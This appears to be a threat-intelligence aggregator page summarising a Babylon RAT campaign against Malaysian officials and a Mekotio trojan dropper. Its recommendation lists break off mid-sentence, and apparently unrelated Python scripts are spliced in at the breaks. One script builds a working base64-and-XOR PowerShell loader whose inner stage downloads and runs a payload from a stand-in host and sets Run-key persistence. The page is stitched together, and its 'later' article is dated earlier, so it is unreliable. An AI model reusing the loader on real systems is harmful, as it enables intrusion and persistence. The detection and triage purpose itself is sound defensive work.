One Article Review

The article:
Source RiskIQ
Identifier 8571438
Publication date 2024-09-06 18:14:35 (viewed: 2024-09-06 18:18:13)
Title The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government
(Recycled)
Text
#### Targeted geolocations
- Malaysia
#### Targeted industries
- Government agencies and services
## Snapshot
Researchers at the Cyble Research and Intelligence Lab (CRIL) uncovered a targeted cyberattack campaign against political figures and government officials in Malaysia.
## Description
The campaign, active since July, uses malicious ISO files that bundle several deceptive components: shortcut (LNK) files, hidden PowerShell scripts, malicious executables and decoy PDF documents. The primary objective of these files is to deploy Babylon RAT, an open-source remote access trojan (RAT) that gives attackers unauthorized control over compromised systems. Upon execution, the malware-laden ISO files use PowerShell scripts to open the decoy PDF while installing the malicious executable on the victim's machine. The executable then establishes persistence by modifying the Windows registry so that it runs at system startup. The final payload, Babylon RAT, lets attackers remotely execute commands, capture keystrokes, steal passwords and exfiltrate sensitive data.
The campaign appears to be a continuation of earlier efforts by the same threat actor, who previously used Quasar RAT, another open-source RAT, to target Malaysian entities. The attackers use techniques such as dynamic API resolution and multi-layer encryption to evade detection and maintain access to compromised systems.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203E-5155-4B5E-AF74-21562B1004D5/analystreport) to defend against
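The infection chain described above (LNK on a mounted ISO, hidden PowerShell launching a decoy PDF while dropping an executable, then a Run-key entry so it survives reboot) is easiest to catch by correlating the stages within one process tree rather than alerting on any single one. The Python below is an added example by the editor, not code from RiskIQ or Cyble. The event shapes mirror Sysmon process-create, file-create and registry-set telemetry, the paths and host names are constructed, and it assumes that double-clicking the LNK lands PowerShell as a child of explorer.exe with a hidden window; neither the script file name nor the drive letter is taken from the report.

```python
"""Correlate endpoint telemetry for the ISO -> LNK -> hidden PowerShell -> Run-key chain.

Editor's example. Assumptions (not from the RiskIQ/Cyble write-up): the LNK double-click
spawns PowerShell under explorer.exe with -WindowStyle Hidden, and the dicts below mirror
Sysmon process-create (1), file-create (11) and registry-set (13) events.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry for one workstation; every path and name is made up.
SAMPLE_EVENTS = [
    {"ts": "2024-09-02T09:14:02", "host": "WS01", "type": "process", "pid": 4120, "ppid": 1880,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File E:\docs\open.ps1"},
    {"ts": "2024-09-02T09:14:03", "host": "WS01", "type": "process", "pid": 4180, "ppid": 4120,
     "image": r"C:\Program Files\Reader\AcroRd32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Program Files\Reader\AcroRd32.exe" E:\docs\Briefing.pdf'},
    {"ts": "2024-09-02T09:14:04", "host": "WS01", "type": "file", "pid": 4120,
     "target": r"C:\Users\user1\AppData\Roaming\WinSvc\svchost.exe"},
    {"ts": "2024-09-02T09:14:05", "host": "WS01", "type": "registry", "pid": 4120,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinSvc",
     "value": r"C:\Users\user1\AppData\Roaming\WinSvc\svchost.exe"},
    # Benign admin activity: a visible PowerShell from a console writing a vendor config key.
    {"ts": "2024-09-02T09:20:00", "host": "WS01", "type": "process", "pid": 5000, "ppid": 600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ts": "2024-09-02T09:20:01", "host": "WS01", "type": "registry", "pid": 5000,
     "key": r"HKLM\SOFTWARE\Vendor\Inventory\LastRun", "value": "2024-09-02"},
]

HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
USER_WRITABLE_EXE = re.compile(r"\\(?:AppData|Temp|Downloads)\\.*\.exe$", re.I)


def _ts(ev):
    return datetime.fromisoformat(ev["ts"])


def _descendants(root_pid, children):
    """All pids in the subtree rooted at root_pid, root included (pid reuse is ignored)."""
    seen, stack = set(), [root_pid]
    while stack:
        pid = stack.pop()
        if pid in seen:
            continue
        seen.add(pid)
        stack.extend(children.get(pid, []))
    return seen


def find_chains(events, window_s=600):
    """One finding per hidden, explorer-spawned PowerShell whose process tree shows at least
    two of: decoy PDF launch, EXE written to a user-writable path, Run key pointing at a
    user-writable EXE; all within window_s seconds of the PowerShell start."""
    children = defaultdict(list)
    for ev in events:
        if ev["type"] == "process":
            children[ev["ppid"]].append(ev["pid"])

    findings = []
    for root in events:
        if root["type"] != "process":
            continue
        if not root["image"].lower().endswith("powershell.exe"):
            continue
        if not root["parent_image"].lower().endswith("explorer.exe"):
            continue
        if not HIDDEN_FLAG.search(root["cmdline"]):
            continue

        tree = _descendants(root["pid"], children)
        start = _ts(root)
        stages = set()
        for ev in events:
            if ev["host"] != root["host"] or ev["pid"] not in tree:
                continue
            if not 0 <= (_ts(ev) - start).total_seconds() <= window_s:
                continue
            if ev["type"] == "process" and ev["cmdline"].lower().rstrip('"').endswith(".pdf"):
                stages.add("decoy_pdf")
            elif ev["type"] == "file" and USER_WRITABLE_EXE.search(ev["target"]):
                stages.add("exe_drop")
            elif (ev["type"] == "registry" and RUN_KEY.search(ev["key"])
                  and USER_WRITABLE_EXE.search(ev["value"])):
                stages.add("run_key_persistence")
        if len(stages) >= 2:
            findings.append({"host": root["host"], "pid": root["pid"],
                             "cmdline": root["cmdline"], "stages": sorted(stages)})
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f"{f['host']} pid={f['pid']} stages={f['stages']}\n  {f['cmdline']}")
```

Requiring two of the three stages keeps a lone hidden-window PowerShell (common in legitimate logon scripts) from firing, while the benign console-launched PowerShell in the sample is excluded at the parent check. In production the same logic belongs in the EDR's query language over its own process-GUID lineage, since pid reuse across a long window would otherwise stitch unrelated processes together.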
Rating ★★
Sent Yes
Tags Ransomware Malware Tool Threat


Later articles reprising this one (1):
Source RiskIQ
Identifier 8570653
Publication date 2024-09-05 16:44:40 (viewed: 2024-09-05 17:18:12)
Title Analyzing the Mekotio Trojan
(Recycled)
Text
## Snapshot
Researchers at Cyfirma released an article about the Mekotio Trojan, a sophisticated piece of malware that uses a PowerShell-based dropper to distribute its payload.
## Description
The dropper is heavily obfuscated, employing techniques like custom XOR decryption to hide key details. Upon execution, the dropper gathers system information and communicates with a command-and-control (C2) server to receive additional payloads and instructions. It also ensures persistence by modifying system settings so that the malware executes at system startup. Key functions of the PowerShell script include generating random strings, decoding encrypted data, retrieving system details, checking for antivirus software, and managing file transfers over TCP connections. The malware's primary payload consists of executable and script files, which are extracted, renamed, and executed. The dropper creates shortcuts to these payloads and adds them to the Windows registry to maintain persistence. Observed C2 communication suggests the threat actors may be of Portuguese or Brazilian origin.
## Additional Analysis
Threat actors frequently use PowerShell in their attacks because of its capabilities, its deep integration with the Windows operating system, and the fact that it is a trusted, pre-installed tool on nearly all Windows systems. Unlike most other scripting languages, PowerShell lets attackers interact directly with the Windows API, manipulate system settings, and execute commands in memory, which makes detection harder for traditional antivirus solutions that rely on file-based signatures. PowerShell's versatility allows threat actors to write sophisticated scripts that download additional payloads, obfuscate commands, perform privilege escalation, and achieve persistence on the infected system.
Additionally, PowerShell scripts are easily obfuscated to evade detection and analysis, using techniques like base64 encoding, string concatenation, or custom encryption. The ability to run in-memory (fileless) attacks without leaving traces on disk further complicates detection by endpoint protection tools. Overall, PowerShell's flexibility, stealth, and integration with Windows make it an attractive choice for threat actors seeking to conduct effective and evasive attacks.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-pro
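The obfuscation pattern the analysis describes (a base64 blob wrapping a custom XOR layer that is decoded at run time and fed to Invoke-Expression) can be triaged statically before anything is executed: score the outer script for obfuscation indicators, peel one layer, and score again to see what the inner stage actually does. The Python below is an added example by the editor, not Cyfirma's analysis tooling or the real Mekotio dropper. The sample script, the TEST-NET address 203.0.113.10, the registry path and the single-byte XOR key are all constructed, and the decoder assumes the key is a numeric literal assigned to a variable that is later used with -bxor; real droppers vary the key schedule, so peel_layer() is a pattern to extend rather than a universal decoder.

```python
"""Static triage of an obfuscated PowerShell dropper: score obfuscation indicators, then peel
a base64 + single-byte XOR layer to expose the next stage.

Editor's example. Assumptions (not Cyfirma's): the XOR key is a numeric literal bound to a
variable used with -bxor, and the inner stage is UTF-8 text.
"""
import base64
import re

# Constructed inner stage: download, drop to %APPDATA%, Run-key persistence, execute.
INNER_STAGE = (
    "$u='http://203.0.113.10/stage2.bin'; "
    "$p=\"$env:APPDATA\\upd\\svc.exe\"; "
    "Invoke-WebRequest -Uri $u -OutFile $p; "
    "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name 'upd' -Value $p; Start-Process $p"
)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_sample(key: int = 0x5A) -> str:
    """Constructed outer layer: base64 of the XOR-encrypted inner stage, decoded at run time."""
    blob = base64.b64encode(xor_bytes(INNER_STAGE.encode(), key)).decode()
    return (
        f"$k={key:#x}; "
        "$b=[System.Convert]::FromBase64String('" + blob + "'); "
        "$s=-join($b|%{[char]($_ -bxor $k)}); "
        "IEX $s"
    )


# Indicators an analyst would look for; counts per script, not a verdict on their own.
INDICATORS = {
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "frombase64": re.compile(r"FromBase64String", re.I),
    "xor": re.compile(r"-bxor", re.I),
    "char_cast": re.compile(r"\[char\]", re.I),
    "string_concat": re.compile(r"'[^']*'\s*\+\s*'[^']*'"),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "run_key": re.compile(r"CurrentVersion\\Run", re.I),
}


def obfuscation_indicators(script: str) -> dict:
    return {name: len(rx.findall(script)) for name, rx in INDICATORS.items()}


def peel_layer(script: str):
    """Decode the first base64 blob; if it is XORed with a literal key, undo that too.
    Returns the inner stage as text, or None when there is no blob to peel."""
    m = INDICATORS["base64_blob"].search(script)
    if not m:
        return None
    data = base64.b64decode(m.group(0))
    xm = re.search(r"-bxor\s+(\S+?)\)", script, re.I)
    if xm:
        operand = xm.group(1)
        if operand.startswith("$"):  # key held in a variable: resolve its literal assignment
            am = re.search(re.escape(operand) + r"\s*=\s*(0x[0-9a-f]+|\d+)", script, re.I)
            operand = am.group(1) if am else None
        if operand is not None:
            data = xor_bytes(data, int(operand, 0))
    return data.decode("utf-8", errors="replace")


def triage(script: str) -> dict:
    """Score the outer script, peel one layer, score the inner stage."""
    outer = obfuscation_indicators(script)
    inner_text = peel_layer(script)
    inner = obfuscation_indicators(inner_text) if inner_text else {}
    return {
        "outer": outer,
        "inner": inner,
        "inner_text": inner_text,
        "suspicious": sum(1 for v in outer.values() if v) >= 3,
    }


if __name__ == "__main__":
    report = triage(make_sample())
    print("outer indicators:", report["outer"])
    print("suspicious:", report["suspicious"])
    print("inner stage:", report["inner_text"])
    print("inner indicators:", report["inner"])
```

The point of the second scoring pass is that the outer layer only shows generic loader behaviour (base64, XOR, IEX) while the peeled stage exposes the download and the Run-key write, which is where hunting queries and blocking rules should anchor. When the decoder cannot resolve a key, the function still returns the raw decoded bytes so the analyst can try other key schedules by hand.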
Rating ★★
Sent Yes
Tags Ransomware Malware Tool Threat


The article does not appear to reprise an earlier one.